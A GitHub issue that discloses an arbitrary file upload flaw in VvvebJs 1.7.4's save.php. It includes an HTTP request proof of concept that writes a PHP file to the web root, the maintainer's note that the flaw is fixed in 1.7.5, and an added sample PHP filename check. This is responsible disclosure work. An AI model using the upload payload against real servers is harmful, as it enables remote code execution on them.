VvvebJs 1.7.4 has an arbitrary file upload vulnerability #343

Open
Hebing123 opened this issue Mar 11, 2024 · 2 comments

Hebing123 commented Mar 11, 2024

Summary

VvvebJs version 1.7.4 exhibits an arbitrary file upload vulnerability. An attacker can exploit this vulnerability to upload malicious files onto the server, potentially leading to the execution of arbitrary code under the context of the webserver.

Details

The vulnerability arises from the 'save.php' file as it fails to implement adequate checks on the types of files being uploaded. The 'sanitizeFileName' function is designed to remove any unsecured characters and parameters from the filename and restrict the file extension to '.html'. However, the function fails to validate the user input properly, allowing an attacker to bypass these checks.
Here is the relevant code snippet:

VvvebJs/save.php

Lines 87 to 89 in c6422cf

if (isset($_POST['file'])) {
    $file = sanitizeFileName($_POST['file']);
}

In the code, $_POST['file'] takes user input without proper filtering or verification. The filename provided by user input is assigned to the $file variable, which ultimately gets uploaded to the server without going through sufficient security measures.

Proof of Concept (POC)

POST /save.php HTTP/1.1
Host: 192.168.160.147
Content-Length: 60
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

file=demo%2Flanding%2Findex.php&html=<?php%20phpinfo();%20?>

After uploading, the attacker accesses the URL: http://192.168.160.147/demo/landing/index.php

Impact

Given that this is an arbitrary file upload vulnerability, an attacker can potentially upload any type of file, including malicious PHP scripts or web shells. After successful exploitation, an attacker may leverage the ability to execute arbitrary code in the context of the webserver, enabling them to carry out further attacks, potentially gaining unauthorized access to sensitive data or escalating their privileges on the server.
It is highly recommended that developers patch this vulnerability promptly.
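
A sketch of the kind of server-side filename check the report above calls for, added here as an example; it is not part of the original post and is not the VvvebJs code or its fix. The function name `resolveSavePath`, the editor-root directory and the sample names are assumptions constructed for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not VvvebJs code): map the user-supplied 'file' value to
// a path that must end in .html and must stay inside $baseDir, else null.
function resolveSavePath(string $requested, string $baseDir): ?string
{
    // Allowlist instead of stripping: segments of [A-Za-z0-9_-] only, and the
    // last segment ends in ".html". No dots elsewhere, so "..", "a.php.html"
    // and "index.php" all fail. /D stops "$" matching before a trailing "\n".
    if (!preg_match('#^(?:[A-Za-z0-9_-]+/)*[A-Za-z0-9_-]+\.html$#D', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Resolve the (already existing) parent directory so symlinks are
    // followed before checking that it is still under the editor root.
    $sep = DIRECTORY_SEPARATOR;
    $parent = realpath($base . $sep . dirname($requested));
    if ($parent === false
        || strncmp($parent . $sep, $base . $sep, strlen($base) + 1) !== 0) {
        return null;
    }
    return $parent . $sep . basename($requested);
}

// Constructed demo: a temporary editor root that contains demo/landing/.
$root = sys_get_temp_dir() . '/vvveb-demo-' . bin2hex(random_bytes(4));
mkdir($root . '/demo/landing', 0700, true);

$samples = [
    'demo/landing/index.html',    // legitimate page save
    'demo/landing/index.php',     // the file value from the report's request
    '../outside.html',            // traversal out of the editor root
    'demo/landing/a.php.html',    // double extension
    "demo/landing/index.html\n",  // trailing newline
    'missing/dir/index.html',     // parent directory does not exist
];
foreach ($samples as $name) {
    $ok = resolveSavePath($name, $root) !== null;
    printf("%-32s %s\n", json_encode($name), $ok ? 'accepted' : 'rejected');
}
rmdir($root . '/demo/landing'); rmdir($root . '/demo'); rmdir($root);
```

This check constrains only where the file is written and what it is called; it does not inspect the `html` body that is saved.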

Owner

givanz commented Mar 11, 2024

Thanks for the vulnerability report. It was previously reported in #339 and fixed in c6422cf, and it is now also included in the last release: https://github.com/givanz/VvvebJs/releases/tag/1.7.5

@Hebing123
Author

I'm glad this issue will be fixed in 1.7.5, thanks to the VvvebJs team for maintaining the project!
